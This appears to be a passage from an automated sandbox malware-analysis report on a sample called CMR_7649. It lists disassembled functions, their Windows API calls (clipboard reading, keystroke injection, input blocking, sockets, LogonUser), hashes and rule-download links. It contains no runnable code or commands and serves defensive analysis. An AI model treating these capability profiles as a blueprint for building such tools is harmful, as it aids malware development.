                                                • API ID: __wcsicollmouse_event
                                                • String ID: DOWN
                                                • API String ID: 1033544147-711622031
                                                • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: KeyboardMessagePostState$InputSend
                                                • String ID:
                                                • API String ID: 3031425849-0
                                                • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorLastinet_addrsocket
                                                • String ID:
                                                • API String ID: 4170576061-0
                                                • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                • IsWindowVisible.USER32 ref: 0047A368
                                                • IsWindowEnabled.USER32 ref: 0047A378
                                                • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                • IsIconic.USER32 ref: 0047A393
                                                • IsZoomed.USER32 ref: 0047A3A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                • String ID:
                                                • API String ID: 292994002-0
                                                • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                • CoInitialize.OLE32(00000000), ref: 00478442
                                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                • CoUninitialize.OLE32 ref: 0047863C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                • String ID: .lnk
                                                • API String ID: 886957087-24824748
                                                • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenClipboard.USER32(?), ref: 0046DCE7
                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                • CloseClipboard.USER32 ref: 0046DD0D
                                                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                • CloseClipboard.USER32 ref: 0046DD41
                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                • CloseClipboard.USER32 ref: 0046DD99
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                • String ID:
                                                • API String ID: 15083398-0
                                                • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: U$\
                                                • API String ID: 4104443479-100911408
                                                • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Find$File$CloseFirstNext
                                                • String ID:
                                                • API String ID: 3541575487-0
                                                • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                • FindClose.KERNEL32(00000000), ref: 004339EB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: FileFind$AttributesCloseFirst
                                                • String ID:
                                                • API String ID: 48322524-0
                                                • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                • String ID:
                                                • API String ID: 901099227-0
                                                • Opcode ID: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                • Opcode Fuzzy Hash: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                Download Yara Rule
                                                APIs
                                                • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Proc
                                                • String ID:
                                                • API String ID: 2346855178-0
                                                • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • BlockInput.USER32(00000001), ref: 0045A38B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: BlockInput
                                                • String ID:
                                                • API String ID: 3456056419-0
                                                • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: LogonUser
                                                • String ID:
                                                • API String ID: 1244722697-0
                                                • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: NameUser
                                                • String ID:
                                                • API String ID: 2645101109-0
                                                • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: N@
                                                • API String ID: 0-1509896676
                                                • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
